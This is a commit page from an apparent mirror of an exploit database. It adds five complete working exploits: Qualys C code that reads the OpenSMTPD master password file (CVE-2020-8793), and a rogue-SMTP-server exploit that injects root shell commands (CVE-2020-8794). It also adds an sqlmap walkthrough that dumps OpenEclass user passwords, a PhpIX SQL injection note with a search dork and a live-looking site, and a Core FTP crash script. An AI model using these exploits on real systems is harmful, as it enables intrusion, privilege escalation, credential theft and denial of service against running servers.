bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-02-27

Browse source 
5 changes to exploits/shellcodes

Core FTP LE 2.2 - Denial of Service (PoC)
OpenSMTPD 6.6.3 - Arbitrary File Read
OpenSMTPD < 6.6.3p1 - Local Privilege Escalation + Remote Code Execution

GUnet OpenEclass E-learning platform 1.7.3 - 'uname' SQL Injection

PhpIX 2012 Professional - 'id' SQL Injection
This commit is contained in:
Offensive Security 2020-02-27 05:02:27 +00:00
parent 17bb415ff8
commit 2d45ff4f39
6 changed files with 1129 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

573
exploits/linux/remote/48139.c Normal file
View file

@ -0,0 +1,573 @@
# Title: OpenSMTPD 6.6.3 - Arbitrary File Read
# Date: 2020-02-20
# Author: qualys
# Vendor: https://www.opensmtpd.org/
# CVE: 2020-8793
/*
* Local information disclosure in OpenSMTPD (CVE-2020-8793)
* Copyright (C) 2020 Qualys, Inc.
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <https://www.gnu.org/licenses/>.
*/
#include <sys/types.h>
#include <sys/param.h>
#include <sys/stat.h>
#include <sys/sysctl.h>
#include <sys/wait.h>
#include <errno.h>
#include <fcntl.h>
#include <fts.h>
#include <limits.h>
#include <pwd.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define P_SUSPSIG 0x08000000 /* Stopped from signal. */
#define PATH_SPOOL "/var/spool/smtpd"
#define PATH_OFFLINE "/offline"
#define OFFLINE_QUEUEMAX 5
#define die() do { \
printf("died in %s: %u\n", __func__, __LINE__); \
exit(EXIT_FAILURE); \
} while (0)
static const char * const *
create_files(const size_t n_files)
{
size_t f;
for (f = 0; f < n_files; f++) {
char file[] = PATH_SPOOL PATH_OFFLINE "/0.XXXXXXXXXX";
const int fd = mkstemp(file);
if (fd <= -1) die();
if (file[sizeof(file)-1] != '\0') die();
file[sizeof(file)-1] = '\n';
if (write(fd, file, sizeof(file)) != (ssize_t)sizeof(file)) die();
if (close(fd) != 0) die();
}
const char ** const files = calloc(n_files, sizeof(char *));
if (files == NULL) die();
char * const paths[] = { PATH_SPOOL PATH_OFFLINE, NULL };
FTS * const fts = fts_open(paths, FTS_PHYSICAL | FTS_NOCHDIR, NULL);
if (fts == NULL) die();
for (f = 0; ; ) {
const FTSENT * const ent = fts_read(fts);
if (ent == NULL) break;
if (ent->fts_name[0] != '0') continue;
if (ent->fts_name[1] != '.') continue;
if (ent->fts_info != FTS_F) die();
if (ent->fts_level != 1) die();
if (ent->fts_statp->st_gid != ent->fts_parent->fts_statp->st_gid) die();
if (ent->fts_statp->st_size <= 0) die();
const char * const file = strdup(ent->fts_path);
if (file == NULL) die();
if (f >= n_files) die();
files[f++] = file;
}
if (f != n_files) die();
if (fts_close(fts) != 0) die();
if (truncate(files[n_files - 1], 0) != 0) die();
return files;
}
static void
wait_sentinel(const char * const * const files, const size_t n_files)
{
for (;;) {
struct stat sb;
if (lstat(files[n_files - 1], &sb) != 0) {
if (errno != ENOENT) die();
return;
}
if (!S_ISREG(sb.st_mode)) die();
if (sb.st_size != 0) die();
}
die();
}
static void
kill_wait(const pid_t pid)
{
if (kill(pid, SIGKILL) != 0) die();
int status = 0;
if (waitpid(pid, &status, 0) != pid) die();
if (!WIFSIGNALED(status)) die();
if (WTERMSIG(status) != SIGKILL) die();
}
typedef struct {
int stop;
pid_t pid;
int fd;
} t_stopper;
static t_stopper
fork_stopper(const uid_t uid)
{
const int stop = (uid == getuid());
int fds[2];
if (pipe(fds) != 0) die();
const pid_t pid = fork();
if (pid <= -1) die();
const int fd = fds[!pid];
if (close(fds[!!pid]) != 0) die();
if (pid != 0) {
const t_stopper stopper = { .stop = stop, .pid = pid, .fd = fd };
return stopper;
}
int proc_mib[] = { CTL_KERN, KERN_PROC, KERN_PROC_RUID, uid, sizeof(struct kinfo_proc), 0 };
size_t proc_len = 0;
if (sysctl(proc_mib, 6, NULL, &proc_len, NULL, 0) == -1) die();
if (proc_len <= 0) proc_len = sizeof(struct kinfo_proc);
if (proc_len > ((size_t)1 << 20)) die();
const size_t proc_max = 0x10 * proc_len;
void * const proc_buf = malloc(proc_max);
if (proc_buf == NULL) die();
if (proc_mib[5] != 0) die();
proc_mib[5] = proc_max / sizeof(struct kinfo_proc);
for (;;) {
proc_len = proc_max;
if (sysctl(proc_mib, 6, proc_buf, &proc_len, NULL, 0) == -1) die();
if (proc_len <= 0) {
if (stop) die();
continue;
}
if (proc_len >= proc_max) die();
const struct kinfo_proc * kp;
if (proc_len % sizeof(*kp) != 0) die();
for (kp = proc_buf; kp != proc_buf + proc_len; kp++) {
if (*(const uint64_t *)kp->p_comm != *(const uint64_t *)"smtpctl") continue;
if (kp->p_flag & P_SUSPSIG) continue;
const pid_t pid = kp->p_pid;
if (stop && kill(pid, SIGSTOP) != 0) continue;
const int argv_mib[] = { CTL_KERN, KERN_PROC_ARGS, pid, KERN_PROC_ARGV };
static char argv_buf[ARG_MAX];
size_t argv_len = sizeof(argv_buf);
if (sysctl(argv_mib, 4, argv_buf, &argv_len, NULL, 0) == -1) {
continue;
}
if (argv_len <= sizeof(char *)) {
if (stop) die();
continue;
}
if (argv_len >= sizeof(argv_buf)) die();
const char * const * const av = (const void *)argv_buf;
size_t ac;
for (ac = 0; av[ac] != NULL; ac++) {
switch (ac) {
case 0:
if (strcmp(av[ac], "sendmail") != 0) die();
continue;
case 1:
if (strcmp(av[ac], "-S") != 0) die();
continue;
case 2:
if (stop) {
if (strncmp(av[ac], PATH_SPOOL PATH_OFFLINE,
sizeof(PATH_SPOOL PATH_OFFLINE)-1) != 0) die();
static const char ** stopped;
static size_t i_stopped, n_stopped;
size_t i;
for (i = 0; i < i_stopped; i++) {
if (strcmp(av[ac], stopped[i]) == 0) break;
}
if (i < i_stopped) break;
if (i != i_stopped) die();
if (i_stopped >= n_stopped) {
if (i_stopped != n_stopped) die();
if (n_stopped > ((size_t)1 << 20)) die();
n_stopped += ((size_t)1 << 10);
stopped = reallocarray(stopped, n_stopped, sizeof(*stopped));
if (stopped == NULL) die();
}
if (i_stopped >= n_stopped) die();
stopped[i_stopped] = strdup(av[ac]);
if (stopped[i_stopped] == NULL) die();
i_stopped++;
}
const size_t len = strlen(av[ac]) + 1;
if (write(fd, &pid, sizeof(pid)) != (ssize_t)sizeof(pid)) die();
if (write(fd, av[ac], len) != (ssize_t)len) die();
break;
default:
die();
}
break;
}
}
}
die();
}
static void
kill_stopper(const t_stopper stopper)
{
kill_wait(stopper.pid);
if (close(stopper.fd) != 0) die();
}
typedef struct {
int kill;
pid_t pid;
char * args;
} t_stopped;
static t_stopped
wait_stopped(const t_stopper stopper)
{
pid_t pid = 0;
if (read(stopper.fd, &pid, sizeof(pid)) != (ssize_t)sizeof(pid)) die();
if (pid <= 0) die();
static char buf[ARG_MAX];
size_t len = 0;
for (;;) {
if (len >= sizeof(buf)) die();
const ssize_t nbr = read(stopper.fd, buf + len, 1);
if (nbr <= 0) die();
len += nbr;
if (buf[len - 1] == '\0') break;
}
if (len <= 0) die();
if (memchr(buf, '\0', len) != buf + len - 1) die();
char * const args = strdup(buf);
if (args == NULL) die();
const t_stopped stopped = { .kill = stopper.stop, .pid = pid, .args = args };
return stopped;
}
static void
kill_free_stopped(const t_stopped stopped)
{
if (stopped.kill && kill(stopped.pid, SIGKILL) != 0) die();
free(stopped.args);
}
static void
make_stopper_file(const char * const file)
{
const off_t file_size = (off_t)1 << 30;
const off_t line_size = (off_t)1 << 20;
struct stat sb;
if (lstat(file, &sb) != 0) die();
if (!S_ISREG(sb.st_mode)) die();
if (sb.st_size <= 0) die();
if (sb.st_size >= line_size) {
if (sb.st_size > file_size) return;
die();
}
const int fd = open(file, O_WRONLY | O_NOFOLLOW, 0);
if (fd <= -1) die();
off_t l;
for (l = 1; l <= file_size / line_size; l++) {
if (lseek(fd, line_size, SEEK_END) <= l * line_size) die();
if (write(fd, "\n", 1) != 1) die();
}
if (close(fd) != 0) die();
}
static size_t
find_stopped_file(const char * const * const files, const size_t n_files,
const t_stopped stopped)
{
size_t f;
for (f = 0; f < n_files; f++) {
if (strcmp(files[f], stopped.args) == 0) {
if (f >= n_files - 1) die();
return f;
}
}
die();
}
static void
disclose_masterpasswd(const size_t n_files)
{
if (getuid() == 0) die();
const char * const * const files = create_files(n_files);
size_t i;
for (i = 0; i < n_files - 1; i++) {
make_stopper_file(files[i]);
}
t_stopped queue_stopped[OFFLINE_QUEUEMAX];
size_t t = 0;
size_t q;
const t_stopper queue_stopper = fork_stopper(getuid());
puts("ready");
for (q = 0; q < OFFLINE_QUEUEMAX; q++) {
queue_stopped[q] = wait_stopped(queue_stopper);
const size_t f = find_stopped_file(files, n_files, queue_stopped[q]);
printf("%zu (%zu)\n", f, q);
if (f >= t) t = f + 1;
}
kill_stopper(queue_stopper);
if (t < OFFLINE_QUEUEMAX) die();
if (t >= n_files - 1) die();
wait_sentinel(files, n_files);
for (i = 0; i < n_files - 1; i++) {
if (unlink(files[i]) != 0) die();
if (i < t) continue;
if (link(_PATH_MASTERPASSWD, files[i]) != 0) die();
const pid_t pid = fork();
if (pid <= -1) die();
if (pid == 0) {
char * const argv[] = { "/usr/bin/chpass", NULL };
char * const envp[] = { "EDITOR=echo '#' >>", NULL };
execve(argv[0], argv, envp);
die();
}
int status = 0;
if (waitpid(pid, &status, 0) != pid) die();
if (!WIFEXITED(status)) die();
if (WEXITSTATUS(status) != 0) die();
struct stat sb;
if (lstat(files[i], &sb) != 0) die();
if (!S_ISREG(sb.st_mode)) die();
if (sb.st_nlink != 1) die();
if (sb.st_uid != 0) die();
}
const t_stopper target_dumper = fork_stopper(0);
for (q = 0; q < OFFLINE_QUEUEMAX; q++) {
kill_free_stopped(queue_stopped[q]);
}
const t_stopped target_dump = wait_stopped(target_dumper);
puts(target_dump.args);
kill_free_stopped(target_dump);
kill_stopper(target_dumper);
for (i = t; i < n_files - 1; i++) {
if (unlink(files[i]) != 0) die();
}
exit(EXIT_SUCCESS);
}
static void
make_stopper_files(const char * const * const files, const size_t n_files,
const size_t begin_stoppers, const size_t n_stoppers)
{
if (begin_stoppers >= n_files) die();
if (n_stoppers > OFFLINE_QUEUEMAX) die();
const size_t end_stoppers = begin_stoppers + 3 * n_stoppers;
if (end_stoppers >= n_files) die();
size_t f;
for (f = begin_stoppers; f < end_stoppers; f++) {
make_stopper_file(files[f]);
}
}
typedef struct {
pid_t pid;
int fd;
} t_swapper;
static t_swapper
fork_swapper(const char * const target, const char * const file)
{
struct stat sb;
if (lstat(target, &sb) != 0) die();
if (!S_ISREG(sb.st_mode)) die();
if (sb.st_nlink != 1) die();
int fds[2];
if (pipe(fds) != 0) die();
const pid_t pid = fork();
if (pid <= -1) die();
const int fd = fds[!pid];
if (close(fds[!!pid]) != 0) die();
if (pid != 0) {
const t_swapper swapper = { .pid = pid, .fd = fd };
return swapper;
}
if (unlink(file) != 0) die();
if (write(fd, "A", 1) != 1) die();
for (;;) {
if (link(target, file) != 0) die();
if (unlink(file) != 0) die();
}
die();
}
static void
wait_swapper(const t_swapper swapper)
{
char buf[] = "whatever";
if (read(swapper.fd, buf, sizeof(buf)) != 1) die();
if (buf[0] != 'A') die();
}
static void
kill_swapper(const t_swapper swapper)
{
kill_wait(swapper.pid);
if (close(swapper.fd) != 0) die();
}
static void
disclose_deadletter(const size_t n_files, const char * const target)
{
struct stat target_sb;
if (target[0] != '/') die();
if (lstat(target, &target_sb) != 0) die();
if (!S_ISREG(target_sb.st_mode)) die();
if (target_sb.st_nlink != 1) die();
const uid_t target_uid = target_sb.st_uid;
if (target_uid == getuid()) die();
const struct passwd * const target_pw = getpwuid(target_uid);
if (target_pw == NULL) die();
static char deadletter[PATH_MAX];
snprintf(deadletter, sizeof(deadletter), "%s/dead.letter", target_pw->pw_dir);
struct stat deadletter_sb;
if (lstat(deadletter, &deadletter_sb) != 0) {
if (errno != ENOENT) die();
memset(&deadletter_sb, 0, sizeof(deadletter_sb));
}
const char * const * const files = create_files(n_files);
make_stopper_files(files, n_files, 0, OFFLINE_QUEUEMAX);
const t_stopper queue_stopper = fork_stopper(getuid());
puts("ready");
t_stopped queue_stopped[OFFLINE_QUEUEMAX];
size_t t = 0;
size_t q;
for (q = 0; q < OFFLINE_QUEUEMAX; q++) {
queue_stopped[q] = wait_stopped(queue_stopper);
const size_t f = find_stopped_file(files, n_files, queue_stopped[q]);
printf("%zu (%zu)\n", f, q);
if (f >= t) t = f + 1;
}
if (t < OFFLINE_QUEUEMAX) die();
if (t >= n_files - 1) die();
size_t i;
for (i = 0; i < t; i++) {
if (unlink(files[i]) != 0) die();
}
wait_sentinel(files, n_files);
const t_stopper target_dumper = fork_stopper(target_uid);
for (;;) {
make_stopper_files(files, n_files, t + 1, 1);
const t_swapper swapper = fork_swapper(target, files[t]);
wait_swapper(swapper);
kill_free_stopped(queue_stopped[0]);
queue_stopped[0] = wait_stopped(queue_stopper);
kill_swapper(swapper);
const size_t f = find_stopped_file(files, n_files, queue_stopped[0]);
printf("%zu\n", f);
if (f <= t) die();
for (i = t; i <= f; i++) {
if (unlink(files[i]) != 0) {
if (errno != ENOENT) die();
if (i != t) die();
}
}
t = f + 1;
struct stat sb;
if (lstat(deadletter, &sb) != 0) {
if (errno != ENOENT) die();
memset(&sb, 0, sizeof(sb));
}
if (memcmp(&sb, &deadletter_sb, sizeof(sb)) != 0) break;
}
kill_stopper(queue_stopper);
const t_stopped target_dump = wait_stopped(target_dumper);
puts(target_dump.args);
kill_free_stopped(target_dump);
kill_stopper(target_dumper);
for (i = t; i < n_files - 1; i++) {
if (unlink(files[i]) != 0) die();
}
for (q = 0; q < OFFLINE_QUEUEMAX; q++) {
kill_free_stopped(queue_stopped[q]);
}
char * const argv[] = { "/bin/ls", "-l", deadletter, NULL };
char * const envp[] = { NULL };
execve(argv[0], argv, envp);
die();
}
int
main(const int argc, const char * const argv[])
{
setlinebuf(stdout);
puts("Local information disclosure in OpenSMTPD (CVE-2020-8793)");
puts("Copyright (C) 2020 Qualys, Inc.");
if (argc <= 1) die();
const size_t n_files = strtoul(argv[1], NULL, 0);
if (n_files <= OFFLINE_QUEUEMAX) die();
if (n_files > ((size_t)1 << 20)) die();
if (argc == 2) {
disclose_masterpasswd(n_files);
die();
}
if (argc == 3) {
disclose_deadletter(n_files, argv[2]);
die();
}
die();
}

426
exploits/openbsd/remote/48140.c Normal file
View file

@ -0,0 +1,426 @@
/*
* LPE and RCE in OpenSMTPD's default install (CVE-2020-8794)
* Copyright (C) 2020 Qualys, Inc.
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <https://www.gnu.org/licenses/>.
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <netdb.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>
static enum {
CLIENT_SIDE_EXPLOIT,
SERVER_SIDE_EXPLOIT,
} exploit = CLIENT_SIDE_EXPLOIT;
static enum {
NEW_SMTPD_GRAMMAR,
OLD_SMTPD_GRAMMAR,
} grammar = NEW_SMTPD_GRAMMAR;
static struct {
const char * command;
const char * user;
const char * dispatcher;
const char * maildir;
char lines[512];
} inject = {
.command = "X=`mktemp /tmp/x.XXXXXX`&&id>>$X;exit 0",
.user = "root",
.dispatcher = "local_mail",
.maildir = NULL,
};
#define die() do { \
printf("died in %s: %u\n", __func__, __LINE__); \
exit(EXIT_FAILURE); \
} while (0)
static struct addrinfo *
common_getaddrinfo(const char * const host, const char * const port)
{
const struct addrinfo hints = {
.ai_family = AF_INET,
.ai_socktype = SOCK_STREAM,
.ai_protocol = IPPROTO_TCP,
.ai_flags = AI_NUMERICHOST | AI_NUMERICSERV,
};
struct addrinfo * addr = NULL;
if (getaddrinfo(host, port, &hints, &addr) != 0) die();
if (addr == NULL || addr->ai_next != NULL) die();
return addr;
}
static const char *
common_getnameinfo(const struct sockaddr * const addr, const socklen_t addr_len)
{
static char host[NI_MAXHOST];
static char port[NI_MAXSERV];
if (getnameinfo(addr, addr_len, host, sizeof(host), port, sizeof(port),
NI_NUMERICHOST | NI_NUMERICSERV) != 0) die();
static char host_port[NI_MAXHOST + NI_MAXSERV];
if (snprintf(host_port, sizeof(host_port), "%s:%s", host, port) <= 0) die();
return host_port;
}
static void
common_send(const int fd, const char * const format, va_list ap)
{
if (fd <= -1) die();
static char buf[1024];
const int len = vsnprintf(buf, sizeof(buf), format, ap);
if (len <= 0 || (unsigned)len >= sizeof(buf)) die();
printf("--> %s%s", buf, buf[len-1] != '\n' ? "\n" : "");
const char * data = buf;
size_t size = len;
for (;;) {
const ssize_t sent = send(fd, data, size, MSG_NOSIGNAL);
if (sent <= 0) die();
if ((size_t)sent > size) die();
data += sent;
size -= sent;
if (size <= 0) return;
}
die();
}
static int listen_fd = -1;
static void
server_listen(void)
{
if (listen_fd != -1) die();
const struct addrinfo * const addr = common_getaddrinfo("0.0.0.0", "25");
listen_fd = socket(addr->ai_family, addr->ai_socktype, addr->ai_protocol);
if (listen_fd <= -1) die();
const int on = 1;
if (setsockopt(listen_fd, SOL_SOCKET, SO_REUSEADDR, &on, sizeof(on)) != 0) die();
if (bind(listen_fd, addr->ai_addr, addr->ai_addrlen) != 0) die();
if (listen(listen_fd, 10) != 0) die();
printf("\nListening on %s\n",
common_getnameinfo(addr->ai_addr, addr->ai_addrlen));
}
static int server_fd = -1;
static void
server_accept(void)
{
struct sockaddr addr;
socklen_t addr_len = sizeof(addr);
if (listen_fd <= -1) die();
if (server_fd != -1) die();
server_fd = accept(listen_fd, &addr, &addr_len);
if (server_fd <= -1) die();
if (addr_len > sizeof(addr)) die();
const time_t now = time(NULL);
printf("\nConnection from %s\n%s",
common_getnameinfo(&addr, addr_len), ctime(&now));
const int on = 1;
if (setsockopt(server_fd, IPPROTO_TCP, TCP_NODELAY, &on, sizeof(on)) != 0) die();
}
static void
server_send(const char * const format, ...)
{
if (server_fd <= -1) die();
va_list ap;
va_start(ap, format);
common_send(server_fd, format, ap);
va_end(ap);
}
static char server_command[1024];
static void
server_recv(const char * const prefix)
{
if (server_fd <= -1) die();
const size_t prefix_len = strlen(prefix);
if (prefix_len < 4) die();
char * data = server_command;
size_t size = sizeof(server_command);
for (;;) {
const ssize_t rcvd = recv(server_fd, data, size, 0);
if (rcvd <= 0) die();
if ((size_t)rcvd >= size) die();
data += rcvd;
size -= rcvd;
data[0] = '\0';
if (data[-1] != '\n') continue;
if (strchr(server_command, '\n') != data - 1) die();
printf("<-- %s", server_command);
if (strncmp(server_command, prefix, prefix_len) != 0) die();
return;
}
die();
}
static void
server_close(void)
{
if (server_fd <= -1) die();
if (close(server_fd) != 0) die();
server_fd = -1;
}
static void
server_session(const char * const inject_lines)
{
const char * const error_code =
(exploit == SERVER_SIDE_EXPLOIT) ? "421" : "553";
server_accept();
server_send("220 ent.of.line ESMTP\n");
server_recv("EHLO ");
server_send("250 ent.of.line Hello\n");
server_recv("MAIL FROM:<");
if ((strncmp(server_command, "MAIL FROM:<>", 12) == 0) !=
(exploit == SERVER_SIDE_EXPLOIT)) die();
if (inject_lines != NULL) {
if (inject_lines[0] == '\0') die();
if (inject_lines[0] == '\n') die();
if (inject_lines[strlen(inject_lines)-1] == '\n') die();
server_send("%s-Error\n", error_code);
server_send("%s\n\n%s%c", error_code, inject_lines, (int)'\0');
} else {
server_send("%s Error\n", error_code);
server_recv("RSET");
server_send("250 Reset\n");
server_recv("QUIT");
server_send("221 Bye\n");
}
server_close();
}
static const struct addrinfo * client_target = NULL;
static const char * client_mail = NULL;
static const char * client_rcpt = NULL;
static int client_fd = -1;
static void
client_connect(void)
{
if (client_fd != -1) die();
client_fd = socket(client_target->ai_family, client_target->ai_socktype,
client_target->ai_protocol);
if (client_fd <= -1) die();
if (connect(client_fd, client_target->ai_addr,
client_target->ai_addrlen) != 0) die();
printf("\nConnected to %s\n",
common_getnameinfo(client_target->ai_addr, client_target->ai_addrlen));
}
static void
client_send(const char * const format, ...)
{
if (client_fd <= -1) die();
va_list ap;
va_start(ap, format);
common_send(client_fd, format, ap);
va_end(ap);
}
static char client_reply[1024];
static void
client_recv(const char * const prefix)
{
if (client_fd <= -1) die();
const size_t prefix_len = strlen(prefix);
if (prefix_len < 3) die();
char * data = client_reply;
size_t size = sizeof(client_reply);
const char * line = data;
for (;;) {
const ssize_t rcvd = recv(client_fd, data, size, 0);
if (rcvd <= 0) die();
if ((size_t)rcvd >= size) die();
data += rcvd;
size -= rcvd;
data[0] = '\0';
if (data[-1] != '\n') continue;
for (;;) {
const char * const new_line = strchr(line, '\n');
if (new_line == NULL) break;
if (new_line - line < 4) die();
printf("<-- %.*s", (int)(new_line - line + 1), line);
if (strncmp(line, prefix, prefix_len) != 0) die();
if (line[3] == ' ') {
if (new_line + 1 != data) die();
return;
}
if (line[3] != '-') die();
line = new_line + 1;
}
if (line != data) die();
}
die();
}
static void
client_close(void)
{
if (client_fd <= -1) die();
if (close(client_fd) != 0) die();
client_fd = -1;
}
static void
client_session(void)
{
client_connect();
client_recv("220 ");
client_send("HELP\n");
client_recv("214");
if (strstr(client_reply, "please contact bugs@openbsd.org") == NULL) die();
client_send("EHLO ent.of.line\n");
client_recv("250");
const int dsn = (strstr(client_reply, "250-DSN") != NULL);
client_send("MAIL FROM:<%s>\n", client_mail);
client_recv("250 ");
client_send("RCPT TO:<%s>%s\n", client_rcpt, dsn ? " NOTIFY=SUCCESS" : "");
client_recv("250 ");
client_send("DATA\n");
client_recv("354 Enter mail, end with ");
if (!dsn) {
client_send("Delivered-To: %s\n", client_rcpt);
}
client_send("\n");
client_send(".\n");
client_recv("250 ");
client_send("QUIT\n");
client_recv("221 ");
client_close();
}
int
main(int argc, char * const * argv)
{
setlinebuf(stdout);
puts("LPE and RCE in OpenSMTPD's default install (CVE-2020-8794)");
puts("Copyright (C) 2020 Qualys, Inc.");
int opt;
while ((opt = getopt(argc, argv, "c:u:d:m:n")) != -1) {
switch (opt) {
case 'c':
inject.command = optarg;
break;
case 'u':
grammar = OLD_SMTPD_GRAMMAR;
inject.user = optarg;
break;
case 'd':
inject.dispatcher = optarg;
break;
case 'm':
grammar = OLD_SMTPD_GRAMMAR;
inject.maildir = optarg;
break;
case 'n':
grammar = NEW_SMTPD_GRAMMAR;
break;
default:
die();
}
}
if (grammar == NEW_SMTPD_GRAMMAR) {
const int len = snprintf(inject.lines, sizeof(inject.lines),
"type:mda\nmda-exec:%s\ndispatcher:%s\nmda-user:%s",
inject.command, inject.dispatcher, inject.user);
if (len <= 0 || (unsigned)len >= sizeof(inject.lines)) die();
} else if (grammar == OLD_SMTPD_GRAMMAR) {
const int len = snprintf(inject.lines, sizeof(inject.lines),
"type:mda\nmda-buffer:%s\nmda-method:%s\nmda-user:%s\nmda-usertable:<getpwnam>",
inject.maildir ? inject.maildir : inject.command,
inject.maildir ? "maildir" : "mda", inject.user);
if (len <= 0 || (unsigned)len >= sizeof(inject.lines)) die();
} else die();
argc -= optind;
argv += optind;
if (argc == 3) {
exploit = SERVER_SIDE_EXPLOIT;
client_target = common_getaddrinfo(argv[0], "25");
client_mail = argv[1];
client_rcpt = argv[2];
} else if (argc != 0) die();
server_listen();
if (exploit == CLIENT_SIDE_EXPLOIT) {
server_session(inject.lines);
} else if (exploit == SERVER_SIDE_EXPLOIT) {
client_session();
unsigned try;
for (try = 0; try < 1; try++) {
server_session(NULL);
puts("\nPlease wait for OpenSMTPD to connect back...");
}
server_session(inject.lines);
client_session();
server_session("type:invalid");
} else die();
exit(EXIT_SUCCESS);
}

72
exploits/php/webapps/48106.txt Normal file
View file

@ -0,0 +1,72 @@
# Exploit Title: GUnet OpenEclass E-learning platform 1.7.3 - 'uname' SQL Injection
# Google Dork: intext:"© GUnet 2003-2007"
# Date: 2019-11-03
# Exploit Author: emaragkos
# Vendor Homepage: https://www.openeclass.org/
# Software Link: http://download.openeclass.org/files/1.7/eclass-1.7.3.tar.gz
# Version: 1.7.3 (2007)
# Tested on: Ubuntu 12 (Apache 2.2.22, PHP 5.3.10, MySQL 5.5.38)
# CVE : -
# GUnet OpenEclass <= 1.7.3 E-learning platform - Unauthenticated Blind SQL Injection
You can confirm applications' version by visiting https://URL/info/about.php
Versions prior to 1.7.3 might also by vulnerable but were not tested.
Source code:
http://download.openeclass.org/files/1.7/eclass-1.7.3.zip
http://download.openeclass.org/files/1.7/eclass-1.7.3.tar.gz
Setup instructions:
http://download.openeclass.org/files/docs/1.7/Install.pdf
Changelog:
https://download.openeclass.org/files/docs/1.7/CHANGES.txt
Manual:
https://download.openeclass.org/files/docs/1.7/eClass.pdf
############################################################################
Vulnerability: Post parameter (uname) is vulnerable to time-based blind SQLi
############################################################################
Steps to reproduce:
1) Visit vulnerable webapp and confirm version is <= 1.7.3 https://URL/info/about.php
2) Configure Burp proxy to intecrept and to capture a login sequence with invalid username/password. (e.g. username:test password:test)
Your request should look like this:
POST / HTTP/1.1
Host: 192.168.1.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.8/
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Connection: close
Cookie: PHPSESSID=d6gupmerbr0k84st4d7qv9jsl1
Upgrade-Insecure-Requests: 1
uname=test&pass=test&submit=%C5%DF%F3%EF%E4%EF%F2
3) Save intercepted request as a file (Right click -> Copy to file -> Save as eclasstestlogin)
4) Load the file to SQLMap with the use of -r parameter
sqlmap -r eclasstestlogin --level=5 --risk=3 -v
SQLMap will find the following payload
---
Parameter: uname (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=test' AND (SELECT 5551 FROM (SELECT(SLEEP(5)))IZsi)-- aLyD&pass=test&submit=%C5%DF%F3%EF%E4%EF%F2
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
5) Exploit it!
sqlmap -r eclasstestlogin -v --current-db
sqlmap -r eclasstestlogin -v -D [DB-NAME-GOES-HERE] --dump
sqlmap -r eclasstestlogin -v -D [DB-NAME-GOES-HERE] -T user -C password --dump
6) Bonus! Passwords are stored in plaintext

21
exploits/php/webapps/48138.txt Normal file
View file

@ -0,0 +1,21 @@
# Title: PhpIX 2012 Professional - 'id' SQL Injection
# Date: 2020-02-26
# Author: indoushka
# Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)
# Vendor : http://www.allhandsmarketing.com/
# poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] /product_detail.php?id=448578 <====| inject here
[+] http://www.pcollectionnecktie.com/sandbox/ <====| Login
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
|
=======================================================================================================================================

32
exploits/windows/dos/48137.py Executable file
View file

@ -0,0 +1,32 @@
# Exploit Title: Core FTP LE 2.2 - Denial of Service (PoC)
# Date: 2020-25-02
# Exploit Author: Ismael Nava
# Vendor Homepage: http://www.coreftp.com/
# Software Link: http://www.coreftp.com/download.html
# Version: 2.2 build 1947
# Tested on: Windows 10 Home x64
# CVE : n/a
#STEPS
# Open the program Core FTP LE
# In File select the option Connect
# Click in the option Advanced from the fiel Host / IP / URL
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "Dog.txt"
# Paste the content in the field Account
# Click in OK
# After Core FTP lE closed, the program did not work again if the user try to
# open again, so it is necessary uninstall and install again
# End :)
buffer = 'R' * 20000
try:
file = open("Dog.txt","w")
file.write(buffer)
file.close()
print("Archive ready")
except:
print("Archive no ready")

5
files_exploits.csv
View file

@ -6684,6 +6684,7 @@ id,file,description,date,author,type,platform,port
48132,exploits/windows/dos/48132.py,"SpotFTP-FTP Password Recover 2.4.8 - Denial of Service (PoC)",2020-02-25,"Ismael Nava",dos,windows, 48132,exploits/windows/dos/48132.py,"SpotFTP-FTP Password Recover 2.4.8 - Denial of Service (PoC)",2020-02-25,"Ismael Nava",dos,windows,
48133,exploits/windows/dos/48133.py,"aSc TimeTables 2020.11.4 - Denial of Service (PoC)",2020-02-25,"Ismael Nava",dos,windows, 48133,exploits/windows/dos/48133.py,"aSc TimeTables 2020.11.4 - Denial of Service (PoC)",2020-02-25,"Ismael Nava",dos,windows,
48136,exploits/windows/dos/48136.py,"Odin Secure FTP Expert 7.6.3 - Denial of Service (PoC)",2020-02-25,"berat isler",dos,windows, 48136,exploits/windows/dos/48136.py,"Odin Secure FTP Expert 7.6.3 - Denial of Service (PoC)",2020-02-25,"berat isler",dos,windows,
